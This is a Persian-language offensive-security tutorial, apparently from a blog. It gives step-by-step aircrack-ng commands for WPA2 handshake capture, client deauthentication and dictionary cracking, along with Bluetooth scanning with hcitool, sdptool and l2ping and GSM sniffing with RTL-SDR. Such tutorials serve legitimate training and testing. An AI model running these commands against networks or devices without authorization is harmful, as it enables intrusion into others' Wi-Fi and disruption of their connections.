آموزش تصویری:

 

شبکه وایرلس یکی از متداول ترین شبکه هایی است که امروزه در خیلی از سازمان ها مورد استفاده قرار می گیرد و نقطه نفوذی به خیلی از سازمان ها از وایرلس هست در زمینه آفنسیو ما باید یک دانش نسبی نسبت به شبکه وایرلس داشته باشیم و توانایی کار با ابزارهای نفوذ به وایرلس و بلوتوث را داشته باشیم گرچه برای نفوذ به این شبکه نیازمند سخت افزار و نرم افزار هستیم

Alpha

Dongle Bluetooth BA04 (raspberry pi => 192.168.1.104 )

Rtl-sdr

 

اصطلاحات شبکه وایرلس:

AP اکسس پوینت یک سخت افزار وایرلس هست که برای اتصال به اینترنت استفاده می شود.Access point

 

ESSID (extended service set identifier)

یک شناسه برای اکسس پوینت که در محیط شناسایی شود بتوانیم به آن وصل شیم.

BSSID (basic service set identifier)

یک شناسه یکتا برای هر اکسس پوینت مشابه آن می توان مک آدرس برای کارت شبکه ها مثال زد

SSID (service set identifier)

اسم یک شبکه وایرلس یا اکسس پوینت می باشد.

Channels

وای فای توانایی سرویس دادن در 14 کانال را دارد منتها طبق قوانین در کشورهای مختلف امکان سرویس دادن در تمامی کانال ها وجود ندارد.

 

Power

هر چقدر فاصله شما با اکسس پوینت وای فای نزدیک باشد پاور بیشتر است و قاعدتا کانکشن بهتری دارید. و همچنین هندشیک سریع انجام می شود.

Security

پرتکول های امنیتی که در اکسس پوینت وجود دارد به ترتیب

Wired Equivalent Privacy (WEP)

یکی از ابتدایی ترین پرتکول ها که در سریع ترین زمان ممکن قابلیت شکستنش وجود دارد.

Wi-Fi Protected Access (WPA)

یک جایگزین برای پرتکول قبلی که دارای ورژن های 1 2 3 هستند که هر کدوم سعی در افزایش امنیت و سخت تر شدن شکستن هش پسوردهای اکسس پوینت هستند.

 

Modes

 

وای فای دارای سه حالت managed master و monitor می باشد.

Wireless range

اکسس پوینت ها داخلی یا خارجی با توجه به قدرت سرویس دادن انتن هایی که دارند تا یک رنجی به شما می توانند سرویس دهند که باز هم به عوامل حایل های ما بین شما و اکسس پوینت مثل شیشه چوپ و … دارد. تقریبا در بهترین حالت می توانند تا 100 متر فاصله به شما سرویس بدهند.

 

Frequency

فرکانس طراحی شده برای شبکه وای فای ما بین 2.4 تا 5 گیگا هرتز می باشد.

 

کامندهایی که باید برای کار با شبکه وایرلس در لینوکس بلد باشید:

ifconfig

iwconfig

iwlist wlan0 scanning

nmcli dev wifi

nmcli dev wifi connect soheilsec  password soheilsec

 

پیدا کردن اکسس پوینت های اطراف:

قبل از هر چیزی برای اینکه بفهمید کارت شبکه که دارید توانایی packet injection دارد یا نه از کامند زیر باید استفاده کنید:

aireplay-ng -9 wlan0

airmon-ng check kill

service NetworkManager restart

قدم اول پیدا کردن اکسس پوینت های اطرافترین تغییر دادن مود کارت شبکه وایرلس به monitor مود است.

airmon-ng start wlan0

airodump-ng wlan0

6C:5A:B0:76:18:56  -62        5        0    0   1  270   WPA2 CCMP   PSK  soheilsec

خوب الان لیست اکسس پوینت های اطراف می بینیم:

BSSID The MAC address of the AP or client

PWR The strength of the signal

ENC The encryption used to secure the transmission #Data The data throughput rate

CH The channel the AP is operating on

ESSID The name of the AP

خیلی ساده  بخوام قبل از حمله بهتون سناریو هک کردن وای فای توضیح بدم هر دستگاه برای اتصال به شبکه وای فای باید از طریق پرتکول های امنیتی احراز هویت بشه و پسورد در واقع داشته باشه و این احراز هویت دایم در حال انجام هست و ماهیت شبکه وایرلس اینکه روی هوا هست و داخل سیم نیست پس هر کسی در اطرافتون میتونه این پکت ها رو کپچر کنه ما کاری که می کنیم اقدام به کپچر پکت های ما بین کلاینت متصل به یک اکسس پوینت و اکسس پوینت می کنیم

در مرحله بعد اقدام به ارسال پکت های deauth برای اینکه دوباره اکسس پوینت از دستگاه بخواد که خودش احراز بکنه می کنیم. نتیجه اینکه دستگاه کلاینت بدون اینکه کاربرش متوجه بشه این احراز انجام می ده و ما این مابین پکت کامل کپچر کردیم.

در مرحله اخر با یک دیکشنری که شامل یک فایل پر از پسورد پر استفاده اقدام به کرک می کنیم و اگر خوش شانس باشیم می تونیم یک وای فای که در نزدیکی ما می باشد رو هک کنیم!

airmon-ng start wlan0 1

airodump-ng -c 1 –bssid 6C:5A:B0:76:18:56 -w soheilsec wlan0

aireplay-ng –deauth 100 -a 6C:5A:B0:76:18:56  -c 6A:FA:A1:5E:04:C0 wlan0

aireplay-ng –deauth 100 -a 6C:5A:B0:76:18:56  -c A6:90:39:10:5D:10 wlan0

 

aircrack-ng -w wordlist.dic -b 6C:5A:B0:76:18:56  soheilsec.cap

 

شناسایی دستگاه های بلوتوث اطراف و اتصال به آن ها

امروزه خیلی از دستگاه های جانبی ما برای اتصال به سیستم های خودشان با کمک بلوتوث متصل می شوند همچنین در شبکه اینترنت اشیا نیز استفاده از بلوتوث خیلی زیاد می باشد.

به عنوان شخصی که قصد دارید به این شبکه نفوذ کنید در ابتدا باید بدانید این شبکه چطور کار می کند؟

 

چطوری بلوتوث کار میکنه؟

بلوتوث یک پرتکول جهانی برای دستگاه های low power هست که جهت ارتباطات نزدیک با فرکانس 2.4 تا 2.485 گیگا هرتز در سال 1994 توسط کمپانی اریکسون معرفی شد نهایت مسافتی که میشه از پرتکول بهره گرفت بین 10 تا 100 متر هست

برای اینکه به دستگاه های با پرتکول بلوتوث وصل بشید باید آن ها در مود قابل کشف یا همون discoverable mode باشند .

 

Name

Class

List of services Technical information

 

وقتی دو دستگاه با بلوتوث به هم متصل شده اند با هم سکرت تبادل می کنند. همچنین هر دستگاه یک شناسه یکتا به نام Mac address داره که از سمت IEEE  و کارخونه بهش تعلق می گیره برای کار و شناسایی این دستگاه های بلوتوثی این حداقل اطلاعاتی که باید داشته باشیم

اسکن کردن بلوتوث و شناسایی دستگاه ها

hciconfig

این کامند مشابه کامند ifconfig برای دستگاه های بلوتوثی هست

 

hcitool

این کامند جهت استعلام دستگاه بلوتوث برای استخراج :

 device name, device ID, device class, and device clock information

استفاده می شود

 

hcidump

ابزاری که قابلیت اسنیف ارتباط بلوتوث را به ما می دهد و ما می توانیم داده های که با بلوتوث انجام شده را پکتش را کپچر کنیم.

 

apt-get install bluez

hciconfig

hciconfig hci0 up

اسکن دستگاههای بلوتوث با hcitool

hcitool scan

hcitool inq

sudo bluetoothctlagent ondefault-agentscan on btscanner

 

اسکن کردن سرویس های بلوتوث با sdptool

Service Discovery Protocol (SDP) پرتکول بلوتوث هست برای سرچ کردن دستگاه های بلوتوث خوش بختانه ابزار sdptool این قابلیت را به ما می دهد و نکته دیگر مهم نیست که دستگاه روی مود قابل شناسایی باشد

sdptool browse 00:5B:94:26:26:54

بررسی قابل دسترس بودن دستگاه ها با استفاده از l2ping

اگر مک آدرس دستگاه های اطراف در بیاریم می توانیم بدون توجه به discovery mode بودن آن ها متوجه بشیم دستگاه هنوز فعال هست یا نه فقط کافی هست از سینتکس زیر استفاده کنیم:

l2ping 00:5B:94:26:26:54 -c 4

 

SDR  چیست؟ رادیو نرم افزاری یا Software Defined Radio

عبارت کامل ‘Software Defined Radio’ اولین بار در سال 1992 توسط آقای جوزف میتولا مطرح شد. این امر در یک مقاله تخصصی که تا سالهابعد مورد استناد پژوهشگران بود، صورت گرفت. اگرچه تئوری رادیو نرم افزار بصورت آکادمیک در سال 1992 مطرح شد، اما بایستی به این نکته توجه کرد که مراکز نظامی در آمریکا و اروپا، از سالها قبل و در اواخر دهه 1970 کار روی این موضوع را شروع کرده بودند. بعنوان مثال، والتر توتلب در همان سالها یک رادیو VHF بکمک یک ADC و یک میکروپروسسور 8085 ساخته بود.

 

چطور رادیو های اطراف را می توان اسنیف کرد.

apt install kalibrate-rtl gqrx-sdr

kal -s GSM900 -g 40

gqrx